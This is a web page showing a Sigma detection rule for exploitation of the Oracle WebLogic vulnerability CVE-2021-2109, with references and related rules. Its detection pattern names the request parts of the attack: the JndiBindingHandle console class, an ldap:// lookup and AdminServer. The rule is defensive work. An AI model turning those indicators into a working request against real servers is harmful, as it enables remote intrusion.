Oracle WebLogic Exploit CVE-2021-2109
Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
Sigma rule (View on GitHub)
1title: Oracle WebLogic Exploit CVE-2021-2109
2id: 687f6504-7f44-4549-91fc-f07bab065821
3status: test
4description: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
5references:
6 - https://twitter.com/pyn3rd/status/1351696768065409026
7 - https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
8author: Bhabesh Raj
9date: 2021/01/20
10modified: 2023/01/02
11tags:
12 - attack.t1190
13 - attack.initial_access
14 - cve.2021.2109
15 - detection.emerging_threats
16logsource:
17 category: webserver
18detection:
19 selection:
20 cs-method: 'GET'
21 cs-uri-query|contains|all:
22 - 'com.bea.console.handles.JndiBindingHandle'
23 - 'ldap://'
24 - 'AdminServer'
25 condition: selection
26fields:
27 - c-ip
28 - c-dns
29falsepositives:
30 - Unknown
31level: critical
References
Related rules
- CVE-2010-5278 Exploitation Attempt
- CVE-2020-0688 Exchange Exploitation via Web Log
- CVE-2020-0688 Exploitation Attempt
- CVE-2020-10148 SolarWinds Orion API Auth Bypass
- CVE-2020-5902 F5 BIG-IP Exploitation Attempt